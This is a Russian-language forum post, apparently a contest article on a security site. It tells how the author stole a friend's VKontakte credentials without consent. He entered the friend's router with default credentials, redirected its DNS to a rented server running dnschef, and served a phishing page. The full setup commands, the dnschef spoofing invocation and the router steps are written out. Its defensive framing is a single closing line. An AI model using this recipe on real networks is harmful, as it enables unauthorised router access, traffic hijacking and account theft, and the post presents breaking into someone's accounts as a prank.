• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Конкурс Фишинговая атака с подменой DNS

Статья для участия в конкурсе Конкурс 2018 года - авторская статья по любой тематике нашего форума!

Данная статья написана в ознакомительных целях, с одним единственным напутствием - просветить Вас о том, как не попасться на удочку злоумышленников, которые желают завладеть Вашими регистрационными данными (e-mail, логин, пароль и другими).

ПРЕДИСЛОВИЕ

Однажды я решил проучить своего друга, сетевой роутер которого был защищён парой login: pass, которая конечно же никому не могла прийти в голову, а именно admin:admin. На мои доводы о том, что нужно сменить пароль на роутере, мой друг лишь отмахивался и говорил - "кому это нужно". В основном компьютер служил ему для того, чтобы пообщаться и полистать ленту новостей "В Контакте", данная соцсеть даже была установлена стартовой страницей по умолчанию в браузере Mozilla Firefox. Естественно, обо всём этом мне было известно.

В один прекрасный день дружбан прибежал с пар домой, включил комп зашёл в свой любимый контакт, ввёл логин и пароль, но социальная сеть не давала ему залогиниться. Друг отчаянно ввёл логин с паролем ещё 15 раз, и после очередной неудачной попытки позвонил мне. Я посоветовал ему перезагрузить роутер, после чего всё прекрасно заработало. Друг зашёл в ВК и увидел сообщение от "неизвестного человека", в котором были указаны его логин и пароль от ВКонтакта.

КАК МНЕ УДАЛОСЬ ЭТО СДЕЛАТЬ

1. Я создал свой DNS сервер;
2. Зашёл в настройки роутера друга (логин и пароль были мне известны);
3. Подменил DNS, указанный в его роутере, на свой и перезагрузил роутер.

1. Создание DNS сервера

Для того, чтобы создать свой DNS сервер, я взял в аренду самый дешёвый VDS (коих в сети предостаточно) под управлением операционной системы Linux Debian 8.5 (я использовал ruvds.com и далее буду рассматривать на его примере). Подключился к нему через специальное приложение PuTTY, введя предоставленные мне учётные данные от VDS и указав следующие значения:
Код:
1. Имя хоста (или IP адрес) - IP адрес моего VDS;
2. Порт - 22
3. Тип соединения - SHH;
4. Управление сеансами - любое название (например CODEBY.NET)
5. Сохранить;
6. Соединиться.

Открывается такое окошко, в котором мы вводим логин и пароль от VDS, которые можно вставить нажатием правой кнопки мыши (пароль в окне PuTTY не отображается никакими символами) и жмём Enter.

HenbTSt.jpeg


При появлении вопроса "Do you want continue [Y/n]" жмём Enter.

Далее для установки DNS сервера вводим следующие команды:
Код:
apt-get install python-ipy
apt-get install python-setuptools
easy_install pip
apt-get install apache2
pip install dnslib
aptitude install vsftpd
adduser username
apt-get update
apt-get install lamp-server^
apt-get install php5 php5-gd php5-mysql php5-curl php5-cli php5-cgi php5-dev
apt-get install phpmyadmin
usermod -a -G www-data username
chmod 777 /var/www/html/ -R
cd /etc
nano vsftpd.conf
(убрать комментарий в строчке #write_enable=YES)
service vsftpd restart
wget http://thesprawl.org/media/projects/dnschef-0.3.zip
apt-get install unzip
unzip dnschef*
cd dnschef*
chmod 755 *.py
python dnschef.py --help

Далее создаём нашу фишинговую страничку index.html и загружаем её на VDS при помощи клиента FileZilla.

Переходим Файл > Менеджер сайтов и вбиваем наши данные, указывая значения, как показано ниже, и жмём Соединиться.

wi9ZR8h.jpeg


Заходим в директорию /var/www/html, удаляем находящийся там файл index.html и загружаем вместо него наш фишинговый index.html.

Далее вновь запускаем PuTTY и вводим следующие значения:
Код:
python dnschef.py -i XXX.XXX.XXX.XXX --truedomains=codeby.net --fakeip=XXX.XXX.XXX.XXX --fakeipv6=XXXX:X:X:X:X:X:XXXX:XXXX --logfile=/root/redirect.log

--truedomains - разрешённые домены, к которым будет доступ (можно указать несколько через запятую);
IPV4 - это обычный IP нашего VDS сервера
IPV6 - нужно сконвертировать из нашего IPV4 (например на этом сайте: )

На этом наш DNS сервер готов к работе.

На последнем шаге вбиваем в браузере IP-адрес и порт роутера нашего друга, вводим его учётные данные (логин и пароль), ищем, где прописан DNS, и заменяем его на наш DNS сервер.

На примере роутера TP-Link это выглядит так

qxfoI55.jpeg


Устанавливайте сложные пароли на свои роутеры и Ваша машина будет защищена от атак подобного рода! Мира Вам и Вашему дому!

Видео в тему:

 

ivanyatka

New member
05.05.2019
3
0
BIT
0
1 Не сталкивались ли вы с проблемой днс кеша в мозиле, разве чтобы такое работало не нужно сначала обнулить браузер ? 2 Работает ли такое в браузерах на основе chromium, разве в них несмотря на настройки роутера он не сверяет новый днс со своим кешем ?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!